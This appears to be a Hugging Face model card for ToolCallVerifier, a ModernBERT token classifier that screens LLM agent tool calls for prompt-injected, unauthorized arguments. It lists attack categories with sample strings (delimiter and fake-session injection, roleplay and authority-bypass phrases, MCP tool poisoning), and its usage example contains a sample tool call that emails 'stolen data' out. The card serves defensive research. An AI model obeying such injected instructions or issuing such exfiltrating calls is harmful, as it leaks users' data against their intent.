File size: 8,232 Bytes
0ff2fee
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
83e80b5
 
386b5c0
83e80b5
386b5c0
 
 
83e80b5
386b5c0
83e80b5
386b5c0
 
 
83e80b5
386b5c0
 
 
 
 
 
 
 
 
 
83e80b5
386b5c0
83e80b5
98443ff
 
386b5c0
 
 
 
d8a91ba
386b5c0
83e80b5
386b5c0
 
 
 
 
 
d8a91ba
386b5c0
d8a91ba
386b5c0
 
 
d8a91ba
98443ff
 
 
 
 
386b5c0
 
98443ff
 
 
 
 
 
 
 
386b5c0
 
 
98443ff
386b5c0
 
d8a91ba
386b5c0
 
 
d8a91ba
 
 
386b5c0
d8a91ba
 
 
 
 
98443ff
386b5c0
 
 
 
83e80b5
386b5c0
83e80b5
 
 
 
 
d8a91ba
83e80b5
 
 
 
 
386b5c0
83e80b5
 
 
 
 
 
 
 
 
386b5c0
 
83e80b5
 
386b5c0
 
 
83e80b5
386b5c0
83e80b5
 
 
 
386b5c0
 
 
83e80b5
 
 
386b5c0
 
 
 
 
83e80b5
386b5c0
 
 
 
 
98443ff
386b5c0
98443ff
 
 
386b5c0
 
 
 
 
 
 
 
 
 
 
98443ff
 
 
 
 
386b5c0
 
 
 
 
83e80b5
386b5c0
83e80b5
 
 
 
98443ff
83e80b5
 
98443ff
83e80b5
 
 
386b5c0
 
 
83e80b5
386b5c0
 
 
 
 
83e80b5
386b5c0
83e80b5
 
98443ff
386b5c0
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
---
language:
- en
license: apache-2.0
library_name: transformers
tags:
- modernbert
- security
- jailbreak-detection
- prompt-injection
- token-classification
- tool-calling
- llm-safety
- mcp
datasets:
- microsoft/llmail-inject-challenge
- allenai/wildjailbreak
- hackaprompt/hackaprompt-dataset
- JailbreakBench/JBB-Behaviors
base_model: answerdotai/ModernBERT-base
pipeline_tag: token-classification
model-index:
- name: tool-call-verifier
  results:
  - task:
      type: token-classification
      name: Unauthorized Tool Call Detection
    metrics:
    - name: UNAUTHORIZED F1
      type: f1
      value: 0.9350
    - name: UNAUTHORIZED Precision
      type: precision
      value: 0.9501
    - name: UNAUTHORIZED Recall
      type: recall
      value: 0.9205
    - name: Accuracy
      type: accuracy
      value: 0.9288
---

# ToolCallVerifier - Unauthorized Tool Call Detection

<div align="center">

[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
[![Model](https://img.shields.io/badge/πŸ€—-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)

**Stage 2 of Two-Stage LLM Agent Defense Pipeline**

</div>

---

## 🎯 What This Model Does

ToolCallVerifier is a **ModernBERT-based token classifier** that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.

| Label | Description |
|-------|-------------|
| `AUTHORIZED` | Token is part of a legitimate, user-requested action |
| `UNAUTHORIZED` | Token indicates injected/malicious content β€” **BLOCK** |

---

## πŸ“Š Performance

| Metric | Value |
|--------|-------|
| **UNAUTHORIZED F1** | **93.50%** |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |

### Confusion Matrix (Token-Level)

```
                    Predicted
                 AUTH      UNAUTH
Actual AUTH      130,708    8,483
       UNAUTH     13,924   161,031
```

---

## πŸ—‚οΈ Training Data

Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:

### HuggingFace Datasets

| Dataset | Description | Samples |
|---------|-------------|---------|
| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |

### Synthetic Attack Generators

| Generator | Description |
|-----------|-------------|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email | Email tool hijacking |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |

---

## 🚨 Attack Categories Covered

| Category | Source | Description |
|----------|--------|-------------|
| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}\]\])` |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |

---

## πŸ’» Usage

```python
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch

model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)

# Example: Verify a tool call
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'

# Combine for classification
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

with torch.no_grad():
    outputs = model(**inputs)
    predictions = torch.argmax(outputs.logits, dim=-1)

id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]

# Check for unauthorized tokens
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
    print("⚠️ BLOCKED: Unauthorized tool call detected!")
    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
    print("βœ… Tool call authorized")
```

---

## βš™οΈ Training Configuration

| Parameter | Value |
|-----------|-------|
| Base Model | `answerdotai/ModernBERT-base` |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |

---

## πŸ”— Integration with FunctionCallSentinel

This model is **Stage 2** of a two-stage defense pipeline:

```
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚   User Prompt   │────▢│ FunctionCallSentinel │────▢│   LLM + Tools   β”‚
β”‚                 β”‚     β”‚      (Stage 1)       β”‚     β”‚                 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜     β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                                              β”‚
                               β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                               β”‚           ToolCallVerifier (This Model)                 β”‚
                               β”‚   Token-level verification before tool execution        β”‚
                               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
```

| Scenario | Recommendation |
|----------|----------------|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | **Both stages** |
| Email/file system access | **Both stages** |
| Financial transactions | **Both stages** |

---

## 🎯 Intended Use

### Primary Use Cases
- **LLM Agent Security**: Verify tool calls before execution
- **Prompt Injection Defense**: Detect unauthorized actions from injected prompts
- **API Gateway Protection**: Filter malicious tool calls at infrastructure level

### Out of Scope
- General text classification
- Non-tool-calling scenarios
- Languages other than English

---

## ⚠️ Limitations

1. **Tool schema dependent** β€” Best performance when tool schema is included in input
2. **English only** β€” Not tested on other languages
3. **Binary classification** β€” No "suspicious" intermediate category (by design, for decisiveness)

---

## πŸ“œ License

Apache 2.0

---

## πŸ”— Links

- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)